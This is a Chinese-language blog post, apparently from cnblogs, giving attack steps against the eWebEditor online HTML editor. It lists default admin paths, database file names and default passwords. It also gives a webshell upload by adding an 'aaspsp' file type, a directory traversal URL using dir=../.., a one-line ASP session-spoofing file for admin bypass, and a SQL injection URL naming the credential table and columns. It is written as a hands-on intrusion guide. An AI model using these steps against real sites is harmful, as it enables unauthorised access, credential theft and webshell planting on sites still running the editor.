• 编辑器漏洞


    网上常用的编辑器有ewebeditor,FCK,DotNetTextBox等,这里只介绍几个常用的。

    Ewebeditor:基于浏览器的,所见即所得的在线HTML编辑器

    默认后台:ewebeditor/admin_login.asp

    默认数据库:ewebeditor/db/ewebeditor.mdb;

          ewebeditor/db/ewebeditor.asa

          ewebeditor/db/ewebeditor.asp

          ewebeditor/db/#ewebeditor.mdb

          ewebeditor/db/#ewebeditor.asa

          ewebeditor/db/!@#ewebeditor.asp

          ewebeditor/db/ewebeditor1033.mdb

    默认账号密码:admin admin/admin888/admin999/admin1/admin000

    找到后台后,我们可以先用默认账号密码尝试登陆,如果没有进去,那么我们可以去下载数据库文件,然后去查找管理员的账号密码

    1)getshell:

    登陆后台,点开样式管理,随意找一个样式打开,在图片类型中添加aaspsp(因为编辑器会过滤asp后缀),接下来就是我们熟悉的上传一句话木马了。

    2)遍历目录漏洞:2.8.0存在该漏洞

    上传文件管理处,有一个样式目录:

    http://xxx.xxx.com/ewebeditor/admin_uploadfile.asp?id=14&dir=.. /..  在id=14后添加绿色部分

    然后你就可以看到整个的网站文件了

    3)利用webEbeditor session欺骗进入后台

    漏洞文件:Aadmin_Private.asp

    新建一个amxking.asp文件,内容如下:

    <%Session("eWebEditor_User") = "11111111"%>
     

    访问该文件,在去访问后台任意文件,就都可以看到了。

    #  4)2.7.0注入漏洞

    http://www.0dayhack.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
    默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用穿山甲进行猜解,对此进行注入取得账号密码。

    FCKeditor编辑器:

    这个编辑器的漏洞下面这个博客讲的很细致,我就不再多做废话了:

    https://blog.csdn.net/lizhengnanhua/article/details/38451737

  • 相关阅读:
    h264 流、帧结构
    H264 帧结构分析、帧判断
    sigaction
    sigaction 用法实例
    sigaction函数的使用
    linux c 之signal 和sigaction区别
    linux 信号signal和sigaction理解
    Hamcrest使用
    Junit4中的新断言assertThat的使用方法
    Hamcrest Tutorial
  • 原文地址:https://www.cnblogs.com/xiaoqiyue/p/10144318.html
Copyright © 2020-2023  润新知